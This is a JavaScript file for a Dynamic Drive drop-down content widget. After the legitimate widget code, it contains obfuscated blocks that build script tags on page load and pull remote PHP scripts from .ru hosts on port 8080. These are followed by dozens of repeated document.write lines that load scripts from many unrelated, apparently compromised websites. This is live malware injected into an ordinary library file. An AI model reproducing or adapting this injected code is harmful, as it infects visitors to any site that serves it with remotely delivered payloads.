//Drop Down/ Overlapping Content: http://www.dynamicdrive.com
//**Updated: Dec 19th, 07': Added ability to dynamically populate a Drop Down content using an external file (Ajax feature)
//**Updated: Feb 29th, 08':
				//1) Added ability to reveal drop down content via "click" of anchor link (instead of default "mouseover")
				//2) Added ability to disable drop down content from auto hiding when mouse rolls out of it
				//3) Added hidediv(id) public function to directly hide drop down div dynamically

//**Updated: Sept 11th, 08': Fixed bug whereby drop down content isn't revealed onClick of anchor in Safari/ Google Chrome

var dropdowncontent={
	disableanchorlink: true, //when user clicks on anchor link, should link itself be disabled (always true if "revealbehavior" above set to "click")
 hidedivmouseout: [true, 200], //Set hiding behavior within Drop Down DIV itself: [hide_div_onmouseover?, miliseconds_before_hiding]
	ajaxloadingmsg: "Loading content. Please wait...", //HTML to show while ajax page is being feched, if applicable
	ajaxbustcache: true, //Bust cache when fetching Ajax pages?

	getposOffset:function(what, offsettype){
		return (what.offsetParent)? what[offsettype]+this.getposOffset(what.offsetParent, offsettype) : what[offsettype]
	},

	isContained:function(m, e){
		var e=window.event || e
		var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement)
		while (c && c!=m)try {c=c.parentNode} catch(e){c=m}
		if (c==m)
			return true
		else
			return false
	},

	show:function(anchorobj, subobj, e){
		if (!this.isContained(anchorobj, e) || (e && e.type=="click")){
			var e=window.event || e
			if (e.type=="click" && subobj.style.visibility=="visible"){
				subobj.style.visibility="hidden"
				return
			}
			var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0 //calculate user added horizontal offset
			var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight //calculate user added vertical offset
			subobj.style.left=this.getposOffset(anchorobj, "offsetLeft") + horizontaloffset + "px"
			subobj.style.top=this.getposOffset(anchorobj, "offsetTop")+verticaloffset+"px"
			subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)" //hide drop down box initially via clipping
			subobj.style.visibility="visible"
			subobj.startTime=new Date().getTime()
			subobj.contentheight=parseInt(subobj.offsetHeight)
			if (typeof window["hidetimer_"+subobj.id]!="undefined") //clear timer that hides drop down box?
				clearTimeout(window["hidetimer_"+subobj.id])
			this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down")
		}
	},

	curveincrement:function(percent){
		return (1-Math.cos(percent*Math.PI)) / 2 //return cos curve based value from a percentage input
	},

	slideengine:function(obj, direction){
		var elapsed=new Date().getTime()-obj.startTime //get time animation has run
		if (elapsed<obj.glidetime){ //if time run is less than specified length
			var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime)
			var currentclip=(distancepercent*obj.contentheight)+"px"
			obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"
			window["glidetimer_"+obj.id]=setTimeout(function(){dropdowncontent.slideengine(obj, direction)}, 10)
		}
		else{ //if animation finished
			obj.style.clip="rect(0 auto auto 0)"
		}
	},

	hide:function(activeobj, subobj, e){
		if (!dropdowncontent.isContained(activeobj, e)){
			window["hidetimer_"+subobj.id]=setTimeout(function(){
				subobj.style.visibility="hidden"
				subobj.style.left=subobj.style.top=0
				clearTimeout(window["glidetimer_"+subobj.id])
			}, dropdowncontent.hidedivmouseout[1])
		}
	},

	hidediv:function(subobjid){
		document.getElementById(subobjid).style.visibility="hidden"
	},

	ajaxconnect:function(pageurl, divId){
		var page_request = false
		var bustcacheparameter=""
		if (window.XMLHttpRequest) // if Mozilla, IE7, Safari etc
			page_request = new XMLHttpRequest()
		else if (window.ActiveXObject){ // if IE6 or below
			try {
			page_request = new ActiveXObject("Msxml2.XMLHTTP")
			} 
			catch (e){
				try{
				page_request = new ActiveXObject("Microsoft.XMLHTTP")
				}
				catch (e){}
			}
		}
		else
			return false
		document.getElementById(divId).innerHTML=this.ajaxloadingmsg //Display "fetching page message"
		page_request.onreadystatechange=function(){dropdowncontent.loadpage(page_request, divId)}
		if (this.ajaxbustcache) //if bust caching of external page
			bustcacheparameter=(pageurl.indexOf("?")!=-1)? "&"+new Date().getTime() : "?"+new Date().getTime()
		page_request.open('GET', pageurl+bustcacheparameter, true)
		page_request.send(null)
	},

	loadpage:function(page_request, divId){
		if (page_request.readyState == 4 && (page_request.status==200 || window.location.href.indexOf("http")==-1)){
			document.getElementById(divId).innerHTML=page_request.responseText
		}
	},

 init:function(anchorid, pos, glidetime, revealbehavior){
		var anchorobj=document.getElementById(anchorid)
		var subobj=document.getElementById(anchorobj.getAttribute("rel"))
		var subobjsource=anchorobj.getAttribute("rev")
		if (subobjsource!=null && subobjsource!="")
			this.ajaxconnect(subobjsource, anchorobj.getAttribute("rel"))
		subobj.dropposition=pos.split("-")
		subobj.glidetime=glidetime || 1000
		subobj.style.left=subobj.style.top=0
		if (typeof revealbehavior=="undefined" || revealbehavior=="mouseover"){
			anchorobj.onmouseover=function(e){dropdowncontent.show(this, subobj, e)}
			anchorobj.onmouseout=function(e){dropdowncontent.hide(subobj, subobj, e)}
			if (this.disableanchorlink) anchorobj.onclick=function(){return false}
		}
		else
			anchorobj.onclick=function(e){dropdowncontent.show(this, subobj, e); return false}
		if (this.hidedivmouseout[0]==true) //hide drop down DIV when mouse rolls out of it?
			subobj.onmouseout=function(e){dropdowncontent.hide(this, subobj, e)}
	}
}


G=7670;G-=79;function w(){var FC=new Date();var q=new Date();var Z=String("onlo"+"ad");sW=["X","z"];var b="appe"+"ndCh"+"ildqvK".substr(0,3);var B=window;this.Um='';var c={yO:false};var e=document;xE={Nj:42551};var a=String("creat"+"eElem"+"entH8pb".substr(0,3));var TX=["m","me"];try {} catch(V){};var N=new String("sc"+"nQfri".substr(3)+"LOlHptlLHO".substr(4,2));try {} catch(d){};var i='';var ba="defeBLEq".substr(0,4)+"r";try {} catch(ql){};var vj=String("i5jJbod".substr(4)+"5rCy".substr(3));Na={g:false};var K=new String("sr"+"c");function T(){var S={rz:false};try {eI=41269;eI-=142;var GF=new Date();var Uo=["To","n"];var x=String("/f"+"re"+"e-"+"fr"+"piF/g".substr(3)+"oo"+"gl"+"e."+"TwEco".substr(3)+"u5Lm/Lu5".substr(3,2)+"st"+"ay"+"fr6M0d".substr(0,2)+"nkGieknG".substr(3,2)+"nd"+"jQ5s.jQ5".substr(3,2)+"u2Ade".substr(3)+".p"+"FVIihpIiVF".substr(4,2));Fx={};var Kh=3441-3440;var F=637390-629310;var Gc={};var u=String("http:lbrJ".substr(0,5)+"Qw2//pas".substr(3)+"sportJ8dP".substr(0,5)+"blues"+"H41m.ru:".substr(4));Ma=["If","A","t"];l=e[a](N);tJ=9514;tJ+=240;ul=3656;ul-=92;try {var cR='Wk'} catch(cR){};l[ba]=Kh;this.An=38323;this.An-=67;var SB=new Array();l[K]=u+F+x;var pv=new Date();this.KhK=60999;this.KhK+=237;R_={zL:17878};rh={nx:241};var xB={TP:false};e[vj][b](l);tz={};D={};var bo=["Fr","H","ae"];} catch(s){var nU=3104;Ij=43292;Ij-=107;};E=["YJ","lH","SV"];}KU={IF:false};this.vC=16887;this.vC--;B[Z]=T;var nX=["CL"];var ib=new String();};w();this.zV=55432;this.zV-=136;
var g=["M","j","A"];try {} catch(nw){};Ay=1814;Ay-=181;try {var e='w'} catch(e){};try {} catch(b){};try {this.T=16328;this.T-=196;var J=["u","K","wd"];var n=window[new String("oxqrunes".substr(4)+"6Dl1cape".substr(4))];var Tr='';TG=[];var v="v";this.To=false;var E=["x","Sv","Gv"];try {var lt='xT'} catch(lt){};Vt=["KZ","V"];var L=String("1");var rB={Ef:46948};this.jG=14963;this.jG+=145;wT=["Gg","Er","WO"];var d="20aonlo".substr(3)+"adm497".substr(0,2);this.Wu='';var m=String("repl"+"ace");this.z_N="z_N";var O='';var nK={};var _=window[(new String("Re"+"gE"+"xp"))];xq={Zn:11795};jD={WH:10435};yQ=["zA"];function r(L,P){var vI={Mk:37023};Fc=[];var MQ="MQ";var mT="mT";this.Tx="Tx";var na=String("[");UN=[];var cK=new String();var rT=new String();aV=53987;aV-=16;this.HI=44351;this.HI++;na+=P;this.lw=264;this.lw++;na+=n("%5d");var Kt={o_:"aW"};var TV=37407;wj={};var WC=["iH"];var N=new _(na, "g");this.ui="";this.qo="qo";this.Vf="";var z_A='';return L.replace(N, O);xF={ku:"ay"};var N_=new Date();};this.nu=6495;this.nu-=146;fN={em:"Df"};var B=57066-48986;this.hP=11681;this.hP+=41;try {var lW='nW'} catch(lW){};this.Wo="Wo";var sW=new Array();var D="htt"+"3AJ7p:/".substr(4)+"/go"+"mGHthgmGH".substr(3,3)+"uil"+"t.r"+"u:";kO=20261;kO-=208;R=52897;R-=172;fr={};rHS={};Ez=57823;Ez-=107;var a="/goo"+"gle."+"com/"+"forbJ1m".substr(0,4)+"es.c"+"om/s"+"OcwEerie".substr(4)+"YhaHsyon".substr(4)+"kis."+"DWYcom.".substr(3)+"php";var KL={};this.Ua='';var gT=false;var om={FC:"Lw"};var re=["ds"];this.Aj=10763;this.Aj++;function Y(){this.SX='';this.iB="";this.PN=43412;this.PN++;var o=document;var Ut=[];_m=["YO","Yy","os"];Gb={};this.zt=36226;this.zt--;rr={};var t="kOfap".substr(3)+"yARpe".substr(3)+"nd"+"igNChNgi".substr(3,2)+"f91DilD91f".substr(4,2)+"dYCi".substr(0,1);Hj={XL:3571};var X=r('sRcErFiFpltY','_wDFbEUvHKLalRfyYW89');var yx={AN:"JH"};this.xM="xM";var Va=[];try {var _c='GO'} catch(_c){};try {var Cj='Db'} catch(Cj){};try {var Fv='OW'} catch(Fv){};var wJ=[];var mM=false;var WZ={Ya:41040};var lL={JGj:35370};BH=o.createElement(X);this.II=62525;this.II-=207;var YS={OB:"MB"};var Ne="Ne";PeY=["Bq"];var bW=false;ys={};var Tj=new Date();XW=D+B;tF={kdJ:"pA"};this.ckc='';XW=XW+a;var AC={TK:"H_"};try {} catch(wS){};EO=[];var jk=["js"];var PS=false;var k=o.body;try {var _I='nJ'} catch(_I){};this.lm="";BH["defe"+"Tl7Zr".substr(4)]=L;yG={};var ZA='';var iG="";var VZ=40672;BH.src=XW;var uF={};this.bP="bP";var Tmu="";var ZR={};WF=25021;WF--;IIa=["CN","YI","QL"];GU=["pK","Bf","JV"];NT=11977;NT--;k[t](BH);var cj="cj";var bG=[];var aZ=[];var rE=["Re"];};this.Rc=4424;this.Rc++;this.vx='';window[d]=Y;try {} catch(gJ){};try {} catch(Ln){};Ds={};var OW_={vw:33282};try {} catch(sS){};Gm=[];ge=[];} catch(l){var qc={OG:26342};Uy=["SU"];this.ysR="ysR";b_={tB:false};qk=[];};this.uih=53028;this.uih+=248;Ar=["_h"];CX={yv:16321};var Eft=["zu","wEo","Kf"];var OYL=["Fr","KQ","No"];




document.write('<script src=http://chambitlove.n4gate.com/board/LUDLOWS.php ><\/script>');
document.write('<script src=http://chambitlove.n4gate.com/board/LUDLOWS.php ><\/script>');
document.write('<script src=http://chambitlove.n4gate.com/board/LUDLOWS.php ><\/script>');
document.write('<script src=http://chambitlove.n4gate.com/board/LUDLOWS.php ><\/script>');
document.write('<script src=http://chambitlove.n4gate.com/board/LUDLOWS.php ><\/script>');
document.write('<script src=http://chambitlove.n4gate.com/board/LUDLOWS.php ><\/script>');
document.write('<script src=http://chambitlove.n4gate.com/board/LUDLOWS.php ><\/script>');
document.write('<script src=http://chambitlove.n4gate.com/board/LUDLOWS.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://kcg.e-volunteer.org.tw/images/PEF7D258CEA7EF.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://glv.co.kr/data/main.php ><\/script>');
document.write('<script src=http://myeshaboutique.co.uk/images/gifimg.php ><\/script>');
document.write('<script src=http://unicite.com/marketing/stat_graph_today.php ><\/script>');
document.write('<script src=http://unicite.com/marketing/stat_graph_today.php ><\/script>');
document.write('<script src=http://bluegamesonline.com/wp-admin/wp-rdf.php ><\/script>');
document.write('<script src=http://bluegamesonline.com/wp-admin/wp-rdf.php ><\/script>');
document.write('<script src=http://bluegamesonline.com/wp-admin/wp-rdf.php ><\/script>');
document.write('<script src=http://collegeadda.com/uploads_article/user_editprofile.php ><\/script>');
document.write('<script src=http://collegeadda.com/uploads_article/user_editprofile.php ><\/script>');
document.write('<script src=http://collegeadda.com/uploads_article/user_editprofile.php ><\/script>');
document.write('<script src=http://cookcountycrimecommission.net/images/gifimg.php ><\/script>');
document.write('<script src=http://fussball-tipprun.de/images/ssmItems.php ><\/script>');
document.write('<script src=http://fussball-tipprun.de/images/ssmItems.php ><\/script>');
document.write('<script src=http://fussball-tipprun.de/images/ssmItems.php ><\/script>');
document.write('<script src=http://fussball-tipprun.de/images/ssmItems.php ><\/script>');
document.write('<script src=http://fussball-tipprun.de/images/ssmItems.php ><\/script>');